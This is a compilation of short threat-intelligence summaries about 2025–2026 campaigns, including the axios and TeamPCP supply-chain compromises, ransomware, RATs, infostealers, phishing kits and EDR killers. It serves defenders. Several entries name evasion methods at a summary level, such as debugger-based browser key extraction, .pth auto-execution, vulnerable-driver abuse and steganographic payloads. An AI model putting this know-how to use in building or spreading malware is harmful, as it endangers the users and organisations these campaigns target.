VERY IMPORTANT

Active since September 2025, Yurei is a double extortion ransomware campaign. The operators run their own Tor data leak site with a low number of victims listed at the time of writing. It is reportedly derived from Prince Ransomware, an open-source ransomware family written in Go. Check Point researchers noted that all samples were first submitted to VirusTotal from Morocco, and that one sample did not include a ticket ID, indicating that this could be a test build, possibly uploaded by the developer themselves. Yurei ransomware samples also contained a link to SatanLockv2, based on the presence of the PDB path string “D:\satanlockv2” present in the Yurei samples.

Google Threat Intelligence Group (GTIG) is tracking an active software supply chain attack targeting the popular Node Package Manager (NPM) package "axios." Between March 31, 2026, 00:21 and 03:20 UTC, an attacker introduced a malicious dependency named "plain-crypto-js" into axios NPM releases versions 1.14.1 and 0.30.4. Axios is the most popular JavaScript library used to simplify HTTP requests, and these packages typically have over 100 million and 83 million weekly downloads, respectively. This malicious dependency is an obfuscated dropper that deploys the WAVESHAPER.V2 backdoor across Windows, macOS, and Linux.

BlueVoyant researchers have uncovered a broad, multi-pronged phishing campaign targeting Spanish-speaking users in organizations across Latin America and now Europe as well. While recent industry intelligence heavily documented attacks utilizing WhatsApp to deliver banking trojans under the umbrella of the Brazil-based eCrime group Augmented Marauder (a.k.a. Water Saci)

Elastic Security Labs identified a supply chain compromise of the axios npm package, one of the most depended-upon packages in the JavaScript ecosystem with approximately 100 million weekly downloads. The attacker compromised a maintainer account and published backdoored versions that delivered a cross-platform Remote Access Trojan to macOS, Windows, and Linux systems through a malicious postinstall hook.

Xloader is an information stealing malware family that evolved from Formbook and targets web browsers, email clients, and File Transfer Protocol (FTP) applications. Additionally, Xloader may execute arbitrary commands and download second-stage payloads on an infected system. The author of Xloader continues to update the codebase, with the most recent observed version being 8.7. Since version 8.1, the Xloader developer applied several changes to the code obfuscation. The purpose of this blog is to describe the latest obfuscation methods and provide an in-depth analysis of the network communication protocol. We highly recommend reading our previous blogs about Xloader in order to get a better understanding of the malware’s internals.

This multi-stage fileless Remcos RAT attack leverages a phishing-delivered JavaScript dropper to trigger a reflective PowerShell loader that executes payloads entirely in memory. The infection chain utilizes obfuscation techniques like rotational XOR and Base64 encoding to reconstruct .NET payloads, significantly reducing the disk-based detection footprint. Stealth is maintained by using aspnet_compiler.exe as a LOLBin to proxy malicious execution and dynamically retrieving the final payload from a remote C2 server.

On March 31, NSFOCUS CERT detected that the npm repository of the HTTP client library Axios was poisoned by the supply chain. The attacker bypassed the normal GitHub Actions CI/CD pipeline of the project, changed the account email address of the axios maintainer to an anonymous ProtonMail address, and manually released a malicious version with a Trojan backdoor through the npm CLI. When the user installs it, a persistent remote control will be established on the host. The impact is wide-ranging, and relevant users are requested to take measures for investigation and protection as soon as possible.

In March 2026, a new MaaS active campaign was discovered promoting previously unknown malware in private Telegram chats. The Trojan features an extensive arsenal of capabilities. On the panel provided to third‑party actors, in addition to the standard features of RAT‑like malware, a stealer, keylogger, clipper, and spyware are also available.

Between late February and March 2026, threat group TeamPCP conducted a highly calculated, escalating sequence of supply chain threats. It systematically compromised widely trusted open-source security tools, including the vulnerability scanners Trivy and KICS and the popular AI gateway LiteLLM. The affected software also includes the official Python SDK of Telnyx.

A zero-day vulnerability in the TrueConf client application, CVE-2026-3502, was exploited in a targeted campaign against government entities in Southeast Asia. The flaw allows attackers controlling an on-premises TrueConf server to distribute and execute arbitrary files across connected endpoints. The campaign, dubbed 'TrueChaos', abused the trusted update channel to deliver malware to multiple government agencies. The attack likely involved a Chinese-nexus threat actor and utilized the Havoc post-exploitation framework. The vulnerability stems from inadequate validation in the update process, enabling malicious updates to be distributed through a centrally managed server. TrueConf has since released a fix in version 8.5.3 of their Windows client.

A sophisticated malware campaign targeting WhatsApp users has been observed since February 2026. The attack chain begins with malicious Visual Basic Script files sent via WhatsApp messages, which, when executed, initiate a multi-stage infection process. The malware uses renamed Windows utilities, retrieves payloads from trusted cloud services, and installs malicious MSI packages. The campaign employs social engineering, stealth techniques, and cloud-based payload hosting to establish persistence and escalate privileges on victim systems. The attackers utilize legitimate tools and trusted platforms to reduce visibility and increase the likelihood of successful execution. The final stage involves the delivery of unsigned MSI installers that enable remote access to compromised systems.

A coordinated supply chain attack targeted the axios npm package, compromising two versions (1.14.1 and 0.30.4) by injecting a malicious dependency. The attack delivered a cross-platform Remote Access Trojan to macOS, Windows, and Linux systems. The compromise occurred through the lead maintainer's npm account, bypassing normal publishing workflows. The malicious payload performed system reconnaissance, established persistence on Windows, and provided remote access capabilities. The attack affected numerous organizations and potentially exposed sensitive credentials. Immediate mitigation steps include pinning to safe versions, removing malicious dependencies, rotating credentials, and blocking the command and control server.

EvilTokens is a new Phishing-as-a-Service offering a turnkey Microsoft device code phishing kit. It enables attackers to harvest access and refresh tokens, granting unauthorized access to victims' Microsoft accounts. The kit supports post-compromise operations, allowing data exfiltration from various Microsoft services. EvilTokens has been rapidly adopted by cybercriminals since March 2026, impacting organizations globally. The service provides advanced capabilities for account takeover, including token conversion to Primary Refresh Tokens and browser cookies for persistent access. Phishing campaigns using EvilTokens target employees in finance, HR, logistics, and sales, primarily for Business Email Compromise attacks.

CrySome is a sophisticated .NET-based remote access trojan designed for persistent command-and-control operations. It features advanced persistence mechanisms, including recovery partition abuse and offline registry modification, allowing it to survive system resets. The malware incorporates an aggressive defense evasion module, disabling security products and blocking updates. Key capabilities include command execution, file operations, surveillance, credential theft, and hidden virtual desktop control. CrySome's modular architecture and structured packet-based protocol enable a wide range of remote operations. Its emphasis on stealth, resilience, and comprehensive system control makes it a significant threat for long-term covert access to compromised environments.

GhostSocks is an emerging threat that turns compromised devices into residential proxy nodes, enabling attackers to evade detection. Originally marketed on Russian underground forums as Malware-as-a-Service, it has gained popularity due to its partnership with Lumma Stealer. Written in GoLang, GhostSocks uses SOCKS5 proxy protocol and TLS encryption to blend malicious traffic into normal network activity. It also incorporates backdoor functionality for running arbitrary commands and deploying additional payloads. Darktrace observed an increase in GhostSocks activity, detecting it alongside Lumma Stealer in customer networks. The malware's versatility in converting devices into proxy nodes while enabling covert network access illustrates how threat actors maximize the value of compromised infrastructure.

A sophisticated phishing campaign targeting LinkedIn users has been identified. The attack uses fake LinkedIn message notifications to lure victims into clicking on malicious links. The emails closely mimic legitimate LinkedIn communications, including spoofed display names and formatting. Upon clicking, users are redirected to a convincing but fraudulent LinkedIn login page designed to steal credentials. The phishing page uses a deceptive domain name similar to 'LinkedIn' to further trick users. This campaign demonstrates the evolving tactics of cybercriminals in exploiting human trust and curiosity. The analysis emphasizes the importance of vigilance, source verification, and caution when interacting with seemingly routine notifications.

An unknown threat actor compromised the npm account of an axios maintainer, publishing two malicious versions of the package. These versions introduced a dependency on plain-crypto-js, a newly created malicious package. Despite quick removal, axios's widespread usage led to rapid exposure. The malicious package includes a dropper that downloads and executes platform-specific second-stage payloads, functioning as remote access trojans. These payloads can execute remote shells, inject binaries, browse directories, list processes, and perform system reconnaissance. Organizations are advised to audit their environments, remove malicious artifacts, rotate exposed credentials, investigate potential compromise paths, and monitor for suspicious activity.

Operation DualScript is a sophisticated multi-stage malware campaign targeting cryptocurrency and financial activities. It utilizes Windows Scheduled Tasks, VBScript launchers, and PowerShell execution to maintain persistence while minimizing disk artifacts. The attack operates through two parallel chains: a web-based PowerShell loader deploying a cryptocurrency clipboard hijacker, and a secondary chain executing the RetroRAT implant in memory. RetroRAT monitors user activity, captures keystrokes, and tracks interactions with financial services to harvest sensitive information. The malware employs various anti-analysis techniques and establishes a command-and-control channel for remote access and data exfiltration. This campaign highlights the growing abuse of trusted system utilities and in-memory execution techniques to evade traditional detection mechanisms.

TeamPCP launched a sophisticated attack on the Telnyx Python SDK, publishing malicious versions 4.87.1 and 4.87.2 to PyPI. The attack represents an evolution from their previous LiteLLM campaign, incorporating WAV-based steganography, split-file code injection, and expanded platform support. The payload, activated on import, uses stealthy techniques to download and execute credential-stealing malware across Linux, macOS, and Windows systems. Key changes include the use of audio steganography to hide malicious code, improved evasion through split-file injection, and the addition of Windows support with Startup folder persistence. The attackers shifted from HTTPS to plaintext HTTP infrastructure, potentially exposing their activities to network monitoring. Organizations are advised to downgrade to the last clean version and treat affected systems as compromised.

Threat actors are exploiting tax season with numerous campaigns leveraging tax themes to deliver malware, remote monitoring tools, fraud attempts, and credential phishing. Over a hundred campaigns have been observed in 2026, with a notable increase in remote monitoring and management (RMM) payloads. Tactics include impersonating tax agencies, claiming expired documents, and requesting tax filing support. While primarily targeting the United States, campaigns have also been observed in Canada, Australia, Switzerland, and Japan. Notable actors include TA4922, a newly designated threat group delivering malware from the Winos4.0 ecosystem, and TA2730, focusing on credential phishing for financial institutions. Business email compromise actors are also using tax form lures to steal financial and personal data. These campaigns demonstrate the ongoing exploitation of timely and topical themes by cybercriminals to deceive users.

Silver Fox, a threat actor, is exploiting Japan's tax filing and organizational change season with a targeted spearphishing campaign against Japanese businesses. The group sends convincing phishing emails related to tax compliance, salary adjustments, and HR matters, tricking recipients into opening malicious links or attachments. The campaign capitalizes on the high volume of legitimate financial and HR communications during this period, increasing the risk of compromise. Silver Fox has expanded its targets from Chinese-speaking entities to Southeast Asia, Japan, and potentially North America. The group uses ValleyRAT, a remote access trojan, to gain control of compromised machines and steal sensitive information. To protect against this threat, organizations should increase vigilance, reinforce awareness about phishing attempts, and verify the authenticity of tax- and HR-themed requests.

A supply chain attack affecting the telnyx Python package on PyPI has been identified. Malicious versions 4.87.1 and 4.87.2 contained embedded credential-harvesting malware. The attack employs a three-stage runtime chain on Linux/macOS using audio steganography for delivery, in-memory execution of a data harvester, and encrypted exfiltration. On Windows, it drops a persistent binary in the Startup folder. The malware uses sophisticated techniques including fileless execution, hybrid encryption, and anti-forensics measures. The threat actor, TeamPCP, demonstrates high operational security and cryptographic awareness. Developers are advised to audit environments, rotate credentials, and check for indicators of compromise.

This analysis examines multiple data leaks attributed to BreachForums between 2022 and 2026, focusing on distinguishing between leak publication dates and actual data timelines. The study covers four datasets associated with different domain names (.vc, .co, .hn, .bf) used by the platform. Each dataset is analyzed based on publication date, format, database structure, and the 'lastactive' field in the user table. The analysis reveals that the domain associated with a leak does not necessarily indicate the timing of the compromise, but rather the context of data collection. The article emphasizes the importance of differentiating between publication date and actual data timeline to avoid misattribution in cyber threat intelligence activities.

A supply chain poisoning attack on LiteLLM, a popular AI model gateway, was detected by NSFOCUS Technology CERT. The TeamPCP group compromised the Trivy security scanning tool used in LiteLLM's release process, allowing them to publish malicious versions 1.82.7 and 1.82.8 on PyPI. These versions contained credential-stealing programs that collected sensitive data and, if a Kubernetes cluster was detected, deployed privileged Pods and implanted persistent backdoors. The attack impacted numerous dependent packages and potentially affected millions of users. The incident highlights the growing risks in AI infrastructure and the need for robust supply chain security measures.

A new phishing campaign is targeting TikTok for Business accounts using adversary-in-the-middle (AitM) techniques. The attackers employ Cloudflare Turnstile to evade detection and create convincing lookalike pages impersonating TikTok for Business or Google Careers. Victims are tricked into clicking malicious links, leading to credential theft. The campaign aims to seize control of business accounts, which can be used for malvertising and malware distribution. Multiple domains are involved in hosting the phishing pages. Additionally, a separate campaign using SVG file attachments to deliver malware has been observed in Venezuela, with potential links to BianLian ransomware activity.

A new macOS infostealer called Infiniti Stealer has been discovered, utilizing ClickFix delivery and Python/Nuitka compilation. The malware spreads through a fake CAPTCHA page, tricking users into running a command themselves. The final payload is a Python-based stealer compiled with Nuitka, making it harder to analyze and detect. The malware targets sensitive data including browser credentials, macOS Keychain entries, cryptocurrency wallets, and developer files. It employs anti-analysis techniques and exfiltrates data via HTTP POST requests. This campaign demonstrates the adaptation of Windows-based techniques to target Mac users and showcases the increasing sophistication of macOS malware.

This analysis examines how threat actors abuse Keitaro, an advertising performance tracker, for various malicious purposes. The report covers a wide range of threats, including malware delivery, phishing, scams, and illegal content distribution. Key findings include the use of Keitaro for cloaking and traffic distribution in malvertising campaigns, spam operations leveraging Keitaro for cryptocurrency wallet draining, and the abuse of Keitaro in investment scams. The report also highlights specific threat actors and their tactics, such as domain hijacking for adult content delivery and the use of fake arrests as clickbait for investment scams. Overall, the analysis demonstrates how Keitaro's features make it attractive to cybercriminals seeking to maximize their reach with minimal effort.

A South Asian financial institution was targeted with two custom malware components: BRUSHWORM, a modular backdoor, and BRUSHLOGGER, a keylogger. BRUSHWORM features anti-analysis checks, encrypted configuration, scheduled task persistence, modular payload downloading, USB worm propagation, and extensive file theft. BRUSHLOGGER uses DLL side-loading to capture system-wide keystrokes with window context tracking. The malware's low sophistication and implementation flaws suggest an inexperienced author, possibly using AI code-generation tools. Multiple testing versions were discovered on VirusTotal, indicating iterative development. The malware components combine to create a functional collection platform with modular loading, USB propagation, broad file theft, air-gap bridging, and persistent keystroke capture.

BlankGrabber, a Python-based information stealer, employs sophisticated techniques to evade detection and exfiltrate sensitive data. It uses a multi-stage infection chain, starting with a batch file loader that disguises the payload as certificate data. The malware implements anti-analysis measures, including sandbox and virtualization checks. It harvests a wide range of data, including browser information, system details, and credentials from various applications. BlankGrabber utilizes Windows Management Instrumentation for system discovery, captures screenshots and webcam images, and attempts to disable Windows Defender. The malware achieves persistence through startup folder manipulation and exfiltrates data using Telegram bots and public web services.

Unit 42 researchers uncovered a series of cyberespionage campaigns targeting a Southeast Asian government organization between June and August 2025. Three distinct activity clusters were identified: Stately Taurus, CL-STA-1048, and CL-STA-1049. Stately Taurus used USB-propagated malware to deploy the PUBLOAD backdoor. CL-STA-1048 employed an espionage toolkit including EggStremeFuel backdoor, Masol RAT, and other tools. CL-STA-1049 utilized a novel Hypnosis loader to deploy FluffyGh0st RAT. These clusters show significant overlap with known China-aligned campaigns, suggesting a coordinated effort to establish persistent access and exfiltrate sensitive data from government networks. The convergence of multiple threat actors indicates a complex, well-resourced operation with a common strategic objective.

EtherRAT, a Node.js-based backdoor linked to a North Korean APT group, was detected in a retail customer's environment. It allows arbitrary command execution, extensive system information gathering, and asset theft. The malware uses 'EtherHiding' to store C2 addresses in Ethereum smart contracts, making infrastructure resilient to takedowns. It communicates using CDN-like beaconing to blend with normal traffic. Initial access varied, including ClickFix and IT Support scams via Microsoft Teams. A SYS_INFO module performs comprehensive host fingerprinting for target selection. The malware checks for CIS languages and self-destructs if found. It collects detailed system information, including hardware, software, and network details.

The Russian-aligned cyber espionage group Pawn Storm has launched a new campaign using the PRISMEX malware suite to target Ukrainian defense and Western military aid infrastructure. The campaign exploits vulnerabilities CVE-2026-21509 and CVE-2026-21513, using advanced steganography, COM hijacking, and cloud service abuse for command and control. PRISMEX components include a dropper, steganography loader, and Covenant Grunt implant. The attacks focus on compromising the Ukrainian defense supply chain, including military allies, meteorological data providers, and transport hubs. The campaign demonstrates Pawn Storm's continued aggression and ability to rapidly weaponize vulnerabilities, posing a significant threat to government and critical infrastructure entities in Central and Eastern Europe.

GlassWorm is a sophisticated malware targeting developers through compromised code repositories and package managers. It executes in stages, starting with a stealthy infection that fingerprints the machine and fetches further payloads via the Solana blockchain. The malware steals sensitive data, including cryptocurrency wallets and development credentials, installs a Remote Access Trojan (RAT), and deploys a fake Chrome extension for extensive surveillance. It uses distributed hash tables and blockchain for resilient command and control. While initially focused on developers with potential cryptocurrency assets, the stolen information could enable wider supply chain attacks. Prevention strategies include careful package management, regular extension audits, and up-to-date anti-malware solutions.

A Canary Intelligence team analysis revealed the resurgence of the Kinsing malware, exploiting three CVEs: CVE-2023-46604 (ActiveMQ), CVE-2023-38646 (Metabase), and CVE-2025-55182 (React2Shell). The attacks, originating from IP 212.113.98.30, converged on a shared staging host at 78.153.140.16. The malware's tactics include downloading and installing a Go-based Linux binary and a stealthy libsystem.so component. The exploitation methods involve retrieving and executing malicious scripts, leading to the installation of Kinsing's core components. This cluster of activity demonstrates how older malware families can remain relevant by exploiting new vulnerabilities without significantly changing their core binaries.

Elastic Security Labs analyzes VoidLink, a sophisticated Linux malware framework combining Loadable Kernel Modules (LKMs) and eBPF for persistence. The rootkit, developed by a Chinese-speaking threat actor, evolved through four generations, targeting kernels from CentOS 7 to Ubuntu 22.04. VoidLink employs advanced techniques like delayed initialization, runtime key rotation, and a hybrid LKM-eBPF architecture for comprehensive stealth. Notable features include an ICMP-based covert channel, process protection, and memfd-aware boot loading. Evidence suggests AI-assisted development, lowering the barrier for kernel-level rootkit creation. Detection strategies and defensive recommendations are provided to counter this emerging threat.

Insikt Group identified five distinct clusters using the ClickFix social engineering technique for initial access. These clusters impersonate various services like Intuit QuickBooks and Booking.com, demonstrating operational variance but similar core techniques. ClickFix manipulates victims into executing malicious commands within native system tools, bypassing traditional security controls. The methodology has become a standardized template for cybercriminals and APT groups. Campaigns target diverse sectors and use sophisticated obfuscation and living-off-the-land tactics. Defenders are advised to implement aggressive behavioral hardening and user awareness training to mitigate these threats.

TeamPCP has launched a supply chain attack targeting LiteLLM, an open-source Python library used in 36% of cloud environments. Malicious versions 1.82.7 and 1.82.8 were published on PyPI, employing sophisticated techniques for payload delivery and persistence. The compromised packages exploit Python's .pth mechanism for stealthy execution across any Python process. The malware collects sensitive data including API keys, cloud credentials, and CI/CD secrets, encrypting and exfiltrating them to attacker-controlled domains. This attack follows TeamPCP's previous compromises of Aqua Security's Trivy and Checkmarx tools, highlighting an ongoing campaign against the open-source ecosystem. The incident underscores the potential for widespread impact and the need for vigilance in software supply chain security.

A malicious supply chain attack has been discovered in the Python Package Index package litellm version 1.82.8. The compromised package contains a malicious .pth file that executes automatically when the Python interpreter starts, without requiring explicit import. This file, located in site-packages/, exfiltrates sensitive information including environment variables, SSH keys, and cloud credentials to an attacker-controlled server. The payload is double base64-encoded to evade basic static analysis. PyPI administrators have quarantined the project to limit its spread. Users are advised to check for the malicious file, rotate all potentially exposed credentials, and audit their PyPI publishing process. The attack is attributed to TeamPCP and is actively exploited in the wild.

On March 19, 2026, Trivy, an open-source vulnerability scanner, was compromised in a sophisticated CI/CD supply chain attack. Threat actors, identified as TeamPCP, injected credential-stealing malware into official Trivy releases, affecting the core binary and GitHub Actions. The attack exploited mutable tags and commit identity spoofing on GitHub. The malware performed extensive credential harvesting, targeting cloud providers, Kubernetes secrets, and various application credentials. Microsoft Defender provides detection and investigation capabilities for this threat. Recommended mitigations include updating to safe versions, hardening CI/CD pipelines, enforcing least privilege, protecting secrets, and leveraging attack path analysis to reduce lateral movement risks.

A new payload in the TeamPCP arsenal has been discovered, capable of wiping entire Kubernetes clusters. The script uses the same ICP canister as the CanisterWorm campaign, with consistent lateral movement via DaemonSets. However, this variant introduces a geopolitically targeted destructive payload aimed specifically at Iranian systems. The malware checks timezone and locale to identify Iranian systems, deploying privileged DaemonSets across every node in Kubernetes environments. Iranian nodes are wiped and force-rebooted, while non-Iranian nodes receive the CanisterWorm backdoor. The latest variant adds network-based lateral movement, exploiting exposed Docker APIs and using SSH for spread. This development shows TeamPCP's ability to operate at supply chain scale and their willingness to engage in destructive actions.

A threat actor known as TeamPCP expanded its supply chain attack from Aqua Security's Trivy to Checkmarx's AST GitHub Action. The attack, which began on March 19, 2026, involved injecting a credential-stealing payload into CI/CD pipelines across thousands of repositories. The malicious code harvested secrets from runner memory, queried cloud metadata, and exfiltrated encrypted data to typosquat domains. The Checkmarx compromise occurred approximately four days after the initial Trivy incident, using identical techniques but targeting a different action. This cascading effect demonstrates how compromised actions can be used to harvest credentials and compromise additional dependencies. Runtime detection proved effective in identifying the attack pattern across both waves, as the underlying behavior remained consistent despite changes in the delivery mechanism.

The KICS GitHub Action, an open-source infrastructure as code security scanner by Checkmarx, was compromised by TeamPCP, the group behind the recent Trivy attack. Between 12:58 and 16:50 UTC on March 23, 35 tags were hijacked, exposing users to credential-stealing malware. The attack involved staging imposter commits and updating tags using a compromised identity. The malware uses a new C2 domain, creates a fallback repository, and adds Kubernetes-focused persistence code. Additionally, two OpenVSX extensions were compromised. The payload targets cloud provider credentials and installs persistence on non-CI systems. Security teams are advised to audit workflows, search for exfiltration artifacts, and implement long-term hardening measures.

A multi-stage malware delivery campaign was uncovered, initially detected through a suspicious VBS file. The investigation revealed a complex attack infrastructure using Unicode obfuscation, PNG-based payload staging, and reflectively loaded .NET execution. The attacker utilized open directories to host multiple obfuscated VBS files, each mapping to different malware payloads including XWorm and Remcos RAT. A secondary infection vector involving a weaponized 'PDF' and batch script was also discovered. The campaign demonstrated a modular approach, allowing for payload rotation and multiple attack vectors from the same domain. This sophisticated infrastructure design enables rapid modification and expansion of available payloads without altering the initial delivery mechanism.

A new cybercriminal group, Nasir Security, believed to be associated with Iran, is targeting energy organizations in the Middle East. They focus on attacking supply chain vendors involved in engineering, safety, and construction. The group emerged in October 2025 and has claimed attacks on various energy sector companies, including Dubai Petroleum, CC Energy Development, and Al-Safi Oil Company. However, their claims are likely exaggerated, and the actual breaches appear to be of third-party contractors. The group's tactics include business email compromise, spear phishing, and exploiting public-facing applications. Their activities are seen as part of a broader Iranian strategy to conduct cyberattacks and spread misinformation during ongoing geopolitical conflicts.

The GhostClaw malware campaign has expanded its distribution methods beyond npm packages to include GitHub repositories and AI-assisted development workflows. The attackers impersonate legitimate tools and utilize multi-stage payloads to steal credentials and retrieve additional malicious code. The infection chain involves executing shell commands, presenting fake authentication prompts, and establishing persistence. The campaign leverages both manual installation through README instructions and automated AI-assisted workflows. Multiple GitHub repositories have been identified, all communicating with a common command-and-control infrastructure. This shift in tactics allows the attackers to target a broader range of victims, including developers and users of AI-assisted coding tools.

A series of attacks targeting Libyan organizations, including an oil refinery, a telecoms organization, and a state institution, occurred between November 2025 and February 2026. The campaign utilized the AsyncRAT backdoor, delivered through spear-phishing emails with Libya-themed lure documents. The attackers exploited current events, such as the assassination of Saif al-Gaddafi, to gain access to networks. The modular nature of AsyncRAT and the targeted organizations suggest possible state sponsorship. The campaign's focus on Libya and its oil industry is notable, given the country's increased oil production and global energy supply concerns amidst Middle East conflicts.

A new supply chain attack targeting Trivy has compromised 75 out of 76 version tags in the aquasecurity/trivy-action GitHub repository. The attacker force-pushed these tags to serve malicious payloads, effectively turning trusted version references into a distribution mechanism for an infostealer. The malicious code executes within GitHub Actions runners, targeting sensitive data in CI/CD environments. It harvests secrets from runner process memory and the filesystem, encrypts the collected data, and exfiltrates it to an attacker-controlled endpoint or a fallback GitHub-based channel. The attack's scope is significant, potentially affecting over 10,000 workflow files on GitHub referencing this action.

A critical vulnerability in Langflow, an open-source visual framework for AI agents and RAG pipelines, was disclosed on March 17, 2026. The vulnerability, CVE-2026-33017, allows unauthenticated remote code execution on exposed Langflow instances. Within 20 hours, exploitation attempts were observed in the wild. Attackers rapidly developed working exploits from the advisory description and began scanning for vulnerable instances. The Sysdig Threat Research Team deployed honeypots to monitor the attacks, observing automated scanning, custom exploit scripts, and data harvesting activities. The rapid exploitation highlights the accelerating trend of shorter time-to-exploit for vulnerabilities, posing significant challenges for defenders. The attackers targeted high-value data, API keys, and potential software supply chain compromise.

VoidStealer is an emerging infostealer that employs a novel debugger-based Application-Bound Encryption (ABE) bypass technique. This method leverages hardware breakpoints to extract the v20_master_key directly from browser memory, requiring neither privilege escalation nor code injection. The technique involves attaching to the browser process as a debugger, setting breakpoints at strategic locations, and extracting the key when it's briefly present in plaintext. This approach offers a lower detection footprint compared to alternative bypass methods. The blog post dissects the technique step-by-step, from locating the target address for breakpoint placement to extracting the key. It also provides detection strategies for defenders, focusing on monitoring debugger attachments and suspicious browser memory reads.

This intelligence report provides a comprehensive analysis of The Gentlemen, a ransomware group known for its sophisticated tactics, techniques, and procedures (TTPs). The group exploits vulnerabilities in FortiOS/FortiProxy, maintains a database of compromised devices, and employs advanced defense evasion techniques. Their initial access methods include exploiting public-facing applications and brute-force attacks. The Gentlemen utilize various execution, persistence, and privilege escalation techniques, while also focusing on credential access and lateral movement. The group's impact includes data encryption and inhibiting system recovery. The report highlights the group's ongoing efforts to improve their ransomware capabilities by reverse-engineering other malware samples.

A sophisticated malware campaign delivering PureLog Stealer has been identified, targeting healthcare, government, hospitality, and education sectors in multiple countries. The attack uses localized copyright violation lures to trick victims into executing a multi-stage infection chain. The malware employs encrypted payloads, remote key retrieval, and fileless execution techniques to evade detection. It utilizes a Python-based loader and dual .NET loaders to run PureLog Stealer entirely in memory. The campaign incorporates AMSI bypass, registry persistence, screenshot capture, and victim fingerprinting for stealth and intelligence gathering. Evidence confirms communication with PureLog-associated infrastructure.

This analysis delves into the Beast ransomware, a Ransomware-as-a-Service (RaaS) that emerged in June 2024 as a successor to Monster ransomware. The investigation focuses on a Beast ransomware server detected in March 2026, revealing the operators' toolkit and attack methodology. The toolkit includes various tools for reconnaissance, network mapping, credential theft, persistence, lateral movement, exfiltration, and impact. Notable findings include the presence of both Windows and Linux versions of Beast ransomware, indicating targeting of workstations and Linux servers on VMware ESXi hypervisors. The report highlights the importance of proactive collection of internet telemetry in identifying ransomware operators' toolkits before they can be used against targets.

A large-scale malvertising campaign targeting U.S. tax form searchers has been uncovered. The attack chain begins with Google Ads, using dual commercial cloaking services to evade detection. Victims are directed to rogue ScreenConnect installers, leading to a multi-stage crypter that ultimately deploys a BYOVD (Bring Your Own Vulnerable Driver) tool. This tool, named HwAudKiller, exploits a previously undocumented Huawei audio driver to terminate antivirus and EDR processes from kernel mode. The campaign's sophistication lies in its use of commodity tools and services, combining free-tier ScreenConnect instances, off-the-shelf crypters, and a signed driver with an exploitable weakness. The attackers consistently deploy multiple remote access tools on compromised hosts for redundancy, indicating a likely pre-ransomware or initial access broker operation.

During tax season, threat actors exploit the urgency of time-sensitive tax-related emails to trick targets into opening malicious attachments, scanning QR codes, or following link chains. Recent campaigns identified by Microsoft Threat Intelligence use lures around W-2 forms, tax forms, and impersonation of government tax agencies and financial institutions. These campaigns aim to harvest credentials or deliver malware, often using phishing-as-a-service platforms for convincing credential theft and MFA bypass. Notable tactics include using legitimate remote monitoring tools, targeting specific industries and roles like accountants, and employing sophisticated social engineering techniques. The campaigns leverage various file formats, legitimate infrastructure, and multiple user interactions to complicate detection.

This analysis explores the ecosystem of EDR (Endpoint Detection and Response) killers, tools used by ransomware attackers to disrupt security solutions before deploying encryptors. The research, based on almost 90 EDR killers tracked in the wild, reveals that these tools are fundamental in modern ransomware operations. Affiliates, not operators, typically choose EDR killers, leading to greater tooling diversity in larger affiliate pools. The same vulnerable driver can appear in unrelated tools, and tools can switch between drivers, making driver-based attribution unreliable. The landscape includes forked proofs of concept, professional implementations, and commercial offerings. While Bring Your Own Vulnerable Driver (BYOVD) technique dominates, custom scripts, anti-rootkits, and driverless approaches are also utilized. The analysis emphasizes the importance of looking beyond drivers to understand the full scope of EDR killer ecosystem and its implications for cybersecurity.

Unit 42 researchers investigated the use of large language models (LLMs) in malware creation and functionality. They examined two samples: a .NET infostealer incorporating OpenAI's GPT-3.5-Turbo model via API, and a Golang-based malware dropper leveraging an LLM for environment assessment. The infostealer's LLM integration was poorly implemented and non-functional, serving as 'AI theater'. The dropper used an LLM to evaluate system safety before deploying its payload. While these samples show experimentation with AI in malware, they highlight challenges in effective implementation. The researchers anticipate future advancements in AI-assisted malware creation and execution, emphasizing the need for evolved defenses against AI-driven threats.

The threat group ShinyHunters has adopted a new tactic of subdomain impersonation for initial access, moving away from newly registered lookalike domains. They are utilizing mobile-first lures and outsourcing spam services to scale their operations. The group is likely reusing previously stolen CRM and ERP data to drive social engineering attacks. Their approach involves phone-guided adversary-in-the-middle phishing to capture credentials and authenticated sessions. ShinyHunters is also scaling vishing operations through paid contractors and specialized harassment services. This evolution in tactics allows for rapid identity-to-SaaS compromise without deploying malware, making traditional domain-based monitoring less effective.

A newly discovered loader called SILENTCONNECT is being used in active campaigns to silently install ScreenConnect, a remote monitoring and management tool, on victim machines. The infection chain begins with users being redirected to a Cloudflare Turnstile CAPTCHA page disguised as a digital invitation. Upon clicking, a VBScript file is downloaded, which retrieves and executes C# source code in memory using PowerShell. SILENTCONNECT employs various evasion techniques, including PEB masquerading and UAC bypass. The campaigns leverage trusted hosting providers like Google Drive and Cloudflare, and abuse living-off-the-land binaries. The loader has been active since March 2025 and poses a significant threat due to its stealthy nature and effectiveness.

A novel and stealthy threat called Infostealer.Speagle has been discovered, hijacking the functionality of Cobra DocGuard, a legitimate security software. This malware collects sensitive information from infected computers and transmits it to a compromised Cobra DocGuard server, masking the data exfiltration as legitimate communications. Speagle specifically targets computers with Cobra DocGuard installed and has shown capabilities to search for documents related to Chinese ballistic missiles. The infection vector remains unknown, but there are indications of a possible supply chain attack. The malware collects system information, file listings, and browser data in multiple phases, using sophisticated techniques to evade detection and self-delete after completing its tasks.

Perseus is a new Android threat that builds upon earlier malware families like Cerberus and Phoenix. It enables real-time monitoring and interaction with infected devices through Accessibility-based remote sessions, allowing full Device Takeover. The malware focuses on extracting high-value personal information, including monitoring user notes. It employs strong anti-analysis measures to evade detection. Perseus is primarily distributed through IPTV applications, targeting users in Turkey and Italy. Its capabilities include overlay attacks, keylogging, and systematic exploration of note-taking apps. The malware performs extensive environment checks to detect analysis conditions and assess device risk. Perseus represents the ongoing evolution of mobile malware, adapting to remain effective in an increasingly secure mobile environment.

A massive network of over 20,000 fraudulent e-commerce domains has been uncovered, all sharing common infrastructure and design patterns. These fake shops, primarily using the .shop domain, are designed to steal payment details and personal data from unsuspecting consumers. The operation is highly industrialized, with domains resolving to just 36 IP addresses, indicating a franchise-style model where a core team manages servers and templates while individual operators launch storefronts. The shops use familiar e-commerce tactics and psychological pressure to lure victims. To protect yourself, use browser protection tools, scrutinize unfamiliar domains, be wary of deep discounts, and look for independent reviews before making purchases.

